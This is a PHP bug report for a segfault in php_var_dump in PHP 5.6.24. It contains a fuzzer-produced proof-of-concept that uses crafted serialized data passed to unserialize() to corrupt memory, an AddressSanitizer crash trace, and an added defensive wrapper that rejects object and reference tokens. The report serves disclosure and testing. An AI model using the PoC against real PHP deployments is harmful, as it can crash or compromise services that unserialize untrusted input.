Bug #72868 segfault var.c:119 (php_var_dump)
Submitted: 2016-08-17 19:42 UTC Modified: 2016-11-21 20:05 UTC
From: brian dot carpenter at gmail dot com Assigned:
Status: Closed Package: Reproducible crash
PHP Version: 5.6.24 OS: Debian 8
Private report: No CVE-ID: None

 [2016-08-17 19:42 UTC] brian dot carpenter at gmail dot com
Description:
------------
Fuzzing PHP 5.6.24 (x64) with American Fuzzy Lop, ASAN and libdislocator.so.


Test script:
---------------
<?php
$poc='a:4:{i:0;i:0;i:1;a:1:{i:0;O:4:"ryat":2:0s:4:"ryat";R:3;s:4:"chtg";i:0;}}i:1;i:0;i:2;R:5;}';$out=unserialize($poc);gc_collect_cycles();$fa0ezval=ptr2str();$fa0ezval.=ptr2str();$fa0ezval.="0000";$fa0ezval.="\4";$fa0ezval.="000";for(;$i;){}var_dump($out[2]);class ryat{var$t;var$g;function __destruct(){$this->chtg=$this->ryat;}}function ptr2str($ptr){$out='';for(;$i<8;$i++){$out.=chr(0);$ptr=0;}return$out;}

Expected result:
----------------
No crash.

Actual result:
--------------
geeknik@debian:~/php-tmp/crashers/070816$ ./php segfault_php_var_dump

Warning: Missing argument 1 for ptr2str(), called in /home/geeknik/php-tmp/crashers/070816/segfault_php_var_dump on line 2 and defined in /home/geeknik/php-tmp/crashers/070816/segfault_php_var_dump on line 2

Warning: Missing argument 1 for ptr2str(), called in /home/geeknik/php-tmp/crashers/070816/segfault_php_var_dump on line 2 and defined in /home/geeknik/php-tmp/crashers/070816/segfault_php_var_dump on line 2
array(1) {
  [0]=>
  ASAN:SIGSEGV
=================================================================
==109204==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000041 (pc 0x0000012da99e bp 0x7ffd43cf3660 sp 0x7ffd43cf3560 T0)
    #0 0x12da99d in php_var_dump /home/geeknik/php-5.6.24/ext/standard/var.c:119:7
    #1 0x12db9a5 in php_array_element_dump /home/geeknik/php-5.6.24/ext/standard/var.c:51:2
    #2 0x15f6298 in zend_hash_apply_with_arguments /home/geeknik/php-5.6.24/Zend/zend_hash.c:701:12
    #3 0x12db3a4 in php_var_dump /home/geeknik/php-5.6.24/ext/standard/var.c:146:4
    #4 0x12dc290 in zif_var_dump /home/geeknik/php-5.6.24/ext/standard/var.c:183:3
    #5 0x184edb0 in zend_do_fcall_common_helper_SPEC /home/geeknik/php-5.6.24/Zend/zend_vm_execute.h:558:5
    #6 0x17311d7 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/geeknik/php-5.6.24/Zend/zend_vm_execute.h:2602:9
    #7 0x16a332e in execute_ex /home/geeknik/php-5.6.24/Zend/zend_vm_execute.h:363:14
    #8 0x16a52da in zend_execute /home/geeknik/php-5.6.24/Zend/zend_vm_execute.h:388:2
    #9 0x15b1cc1 in zend_execute_scripts /home/geeknik/php-5.6.24/Zend/zend.c:1341:4
    #10 0x13be7f1 in php_execute_script /home/geeknik/php-5.6.24/main/main.c:2613:14
    #11 0x1907aaa in do_cli /home/geeknik/php-5.6.24/sapi/cli/php_cli.c:994:5
    #12 0x190474d in main /home/geeknik/php-5.6.24/sapi/cli/php_cli.c:1378:18
    #13 0x7f96c62f2b44 in __libc_start_main /build/glibc-uPj9cH/glibc-2.19/csu/libc-start.c:287
    #14 0x5095ac in _start (/home/geeknik/php-5.6.24/sapi/cli/php+0x5095ac)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/geeknik/php-5.6.24/ext/standard/var.c:119 php_var_dump
==109204==ABORTING
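
The crash above is reached only because untrusted serialized input gets to unserialize() carrying an object (O:) with a destructor and back-references (R:). The following is an added example, not code from the reporter or from PHP: a fail-closed wrapper that refuses such payloads before the engine parses them, shown against the PoC string from this report and a constructed benign payload. The helper names and the token regex are assumptions of this example; on PHP 7.0 and later the allowed_classes option is used as a second layer, on 5.6 (the version reported here) that option does not exist and the token scan is the only guard.

```php
<?php
// Added example (not the reporter's code, not PHP's): a fail-closed wrapper
// around unserialize() for untrusted input. Helper names are assumptions.

/**
 * Refuse serialized payloads that carry objects (O:/C:) or back-references
 * (R:/r:) before the engine sees them. The scan is deliberately naive: a
 * token-like sequence inside a string literal also triggers a rejection,
 * so it fails closed rather than open.
 */
function has_object_or_reference_tokens($data)
{
    return preg_match('/[OC]:\d+:"|[Rr]:\d+;/', $data) === 1;
}

/**
 * Unserialize untrusted data with objects and references refused.
 * Returns the decoded value, or null when the payload is rejected,
 * with the reason written to $reason.
 */
function safe_unserialize($data, &$reason = null)
{
    if (!is_string($data)) {
        $reason = 'not a string';
        return null;
    }
    if (has_object_or_reference_tokens($data)) {
        $reason = 'object or reference token present';
        return null;
    }
    // Second layer on PHP >= 7.0: tell the engine not to instantiate any
    // class. PHP 5.6 has no options argument, so only the scan above applies.
    if (PHP_VERSION_ID >= 70000) {
        $value = @unserialize($data, ['allowed_classes' => false]);
    } else {
        $value = @unserialize($data);
    }
    // unserialize() returns false both for a malformed payload and for the
    // legitimate serialized false ('b:0;'); tell the two apart.
    if ($value === false && $data !== 'b:0;') {
        $reason = 'malformed payload';
        return null;
    }
    return $value;
}

// Constructed inputs: the PoC from this report and a benign array.
$poc = 'a:4:{i:0;i:0;i:1;a:1:{i:0;O:4:"ryat":2:0s:4:"ryat";R:3;s:4:"chtg";i:0;}}i:1;i:0;i:2;R:5;}';
$benign = 'a:2:{i:0;s:3:"abc";i:1;i:42;}';

foreach (['poc' => $poc, 'benign' => $benign] as $label => $payload) {
    $reason = null;
    $result = safe_unserialize($payload, $reason);
    if ($result === null) {
        echo "$label: rejected ($reason)\n";
    } else {
        echo "$label: accepted, type " . gettype($result) . "\n";
    }
}
```

Run with any php CLI: the PoC is rejected on the token scan before unserialize() is ever called, so neither the ryat destructor nor the dangling reference var_dump() trips over is ever created; the benign payload decodes to an array. Rejecting references as well as objects is a deliberate choice for untrusted input, since the PoC needs both; if legitimate payloads must carry shared references, drop the R:/r: alternative and keep the object check.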

History

 [2016-08-17 20:08 UTC] stas@php.net
-Type: Security +Type: Bug
 [2016-11-21 20:05 UTC] brian dot carpenter at gmail dot com
-Status: Open +Status: Closed
 [2016-11-21 20:05 UTC] brian dot carpenter at gmail dot com
Does not affect 5.6.28, returns this error:

Warning: Missing argument 1 for ptr2str(), called in /root/tmp/1.php on line 2 and defined in /root/tmp/1.php on line 2

Warning: Missing argument 1 for ptr2str(), called in /root/tmp/1.php on line 2 and defined in /root/tmp/1.php on line 2
array(1) {
  [0]=>
  &UNKNOWN:0
}
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Mon Apr 29 11:01:32 2024 UTC